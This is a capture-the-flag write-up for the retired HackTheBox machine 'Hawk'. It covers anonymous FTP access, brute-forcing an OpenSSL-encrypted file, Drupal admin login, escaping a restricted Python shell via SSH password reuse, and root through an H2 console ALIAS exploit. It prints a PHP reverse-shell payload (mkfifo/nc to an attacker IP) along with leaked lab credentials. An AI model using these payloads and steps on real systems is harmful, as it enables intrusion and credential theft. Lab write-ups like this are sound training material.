Today the machine named “Hawk” from HackTheBox is deemed retired. It is a great box to learn a diverse set of attack techniques you may be unfamiliar with. In summary:
| User access | Root access |
|---|---|
| FTP service allows anonymous login | SSH tunneling to bypass local access restriction |
| Identify and decrypt OpenSSL file | Exploit H2 ALIAS exploit to allow RCE as root |
| Drupal CMS upload of arbitrary PHP code (RCE) | |
| Password re-use of local Linux account |
Reconnaissance
As with every machine, start with an initial Nmap scan:
root@kali:~/HTB/hawk# nmap -sC -sV -oA hawk.htb 10.10.10.102
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 19:34 CET
Nmap scan report for 10.10.10.102
Host is up (0.037s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
**21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)**
|_drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
**22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)**
| ssh-hostkey:
| 2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
| 256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
|_ 256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
**80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)**
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to 192.168.56.103 | 192.168.56.103
**8082/tcp open http H2 database http console
|_http-title: H2 Console**
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.87 seconds
Important findings from the output:
- FTP (TCP/21) is open allowing anonymous login
- SSH (TCP/22) is open
- HTTP (TCP/80) is open running Drupal 7 CMS
- HTTP (TCP/8082) is open running H2 Console
Encoded file
Let’s first have a look at the FTP service. After logging in as the anonymous user, I can see there is a hidden file named .drupal.txt.enc in the “messages” folder.
root@kali:~/HTB/hawk# ftp 10.10.10.102
Connected to 10.10.10.102.
220 (vsFTPd 3.0.3)
Name (10.10.10.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jun 16 22:14 .
drwxr-xr-x 3 ftp ftp 4096 Jun 16 22:14 ..
drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages
226 Directory send OK.
ftp> cd messages
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 .
drwxr-xr-x 3 ftp ftp 4096 Jun 16 22:14 ..
-rw-r--r-- 1 ftp ftp 240 Jun 16 22:21 .drupal.txt.enc
226 Directory send OK.
After moving the file to my Kali box, I can see that the contents of the file is base64-encoded.
root@kali:~/HTB/hawk# cat .drupal.txt.enc
U2FsdGVkX19rWSAG1JNpLTawAmzz/ckaN1oZFZewtIM+e84km3Csja3GADUg2jJb
CmSdwTtr/IIShvTbUd0yQxfe9OuoMxxfNIUN/YPHx+vVw/6eOD+Cc1ftaiNUEiQz
QUf9FyxmCb2fuFoOXGphAMo+Pkc2ChXgLsj4RfgX+P7DkFa8w1ZA9Yj7kR+tyZfy
t4M0qvmWvMhAj3fuuKCCeFoXpYBOacGvUHRGywb4YCk=
Let’s decode the contents, after which we are left with an OpenSSL encoded file:
root@kali:~/HTB/hawk# base64 -d .drupal.txt.enc > drupal.txt
root@kali:~/HTB/hawk# cat drupal.txt
Salted__kY ԓi-6l7Z>{$p5 2[
8?sWj#T$3AG,f Z\ja>>G6
.EÐVV@ɗ4@wxZNiPtF`)
root@kali:~/HTB/hawk# file drupal.txt
drupal.txt: openssl enc'd data with salted password
The next step would be to identify the cipher that was used to encrypt the contents. I’ve used this Python script that bruteforces ciphers against a wordlist.
root@kali:~/HTB/hawk# python openssl-bruteforce/brute.py /usr/share/wordlists/rockyou.txt openssl-bruteforce/ciphers.txt drupal.txt
....
Password found with algorithm AES-256-CBC: friends
....
I can conclude that the AES-256-CBC cipher together with the key friends was used to encrypt the file. The same key can be used to decrypt the file:
openssl aes-256-cbc -d -in drupal.txt -out result.txt -k friends. We are finally able to see the content of the encoded file:
Daniel,
Following the password for the portal:
PencilKeyboardScanner123
Please let us know when the portal is ready.
Kind Regards,
IT department
Drupal CMS
I tried logging as the user daniel on the Drupal web portal, however that didn’t work. After trying to input the obvious admin as a username and the password PencilKeyboardScanner123, I was able to get in.
Reverse Shell
The most obvious route would be to create a new article using PHP as text format. However, only HTML is supported by the Drupal web service. Go to Modules section and enable the “PHP Filter” module.
Now we are able to create an article using the PHP code filter.
<?php
echo exec ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 1337 >/tmp/f');
?>
Save the article and we get a shell back:
root@kali:~/HTB/hawk# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.102] 33016
/bin/sh: 0: can't access tty; job control turned off
$
Password
Now we have a shell on the machine, let’s enumerate the system. One technique that I commonly use is to check configuration files for credentials. Drupal uses a file named settings.php, which is similar to the wp-config.php file used by WordPress. This settings.php file is located in /var/www/html/sites/default. We can see the password for the MySQL database being drupal4hawk.
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupal',
'password' => 'drupal4hawk',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
I could not find anything interesting inside of the MySQL database. This was the part where I got really stuck. I just could not find a way to escalate from the www-data user. After trying many different things, I ended up with an attempt to login as the user daniel using the MySQL DB password drupal4hawk I found earlier, on the open SSH service. The login was surprisingly successful. We get redirected to the Python interactive mode. Use the Python OS module to escape the restricted shell and read the user.txt file.
root@kali:~/HTB/hawk# ssh daniel@10.10.10.102
daniel@10.10.10.102's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Oct 28 23:42:16 UTC 2018
System load: 0.02 Processes: 102
Usage of /: 54.1% of 9.78GB Users logged in: 0
Memory usage: 44% IP address for ens33: 10.10.10.102
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
55 packages can be updated.
3 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Oct 28 23:42:16 from 10.10.14.13
Python 3.6.5 (default, Apr 1 2018, 05:46:30)
[GCC 7.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('/bin/bash')
daniel@hawk:~$ ls
user.txt
H2 Console
Even though I had a full interactive shell with the daniel user, I was unable to find a way to privesc to root. I took a step back and looked at the H2 database running on port 8082.
Seems like something is blocking us from connecting remotely using our Kali machine. Lets setup a SSH tunnel so we can access the H2 console through a local proxy (the Hawk machine).
ssh -L 8888:127.0.0.1:8082 -N -f -l daniel 10.10.10.102
Then browse to http://127.0.0.1:8888 and we are able to see the H2 console interface:
Connect to the database using the predefined credentials in the interface. I then followed this blogpost to exploit a vulnerability in the H2 Database ALIAS feature. Abusing this vulnerability allows arbitrary code execution as root. From here it is trivial to create a reverse shell payload using msfvenom. In my case, I just used to it view the contents of the root flag.
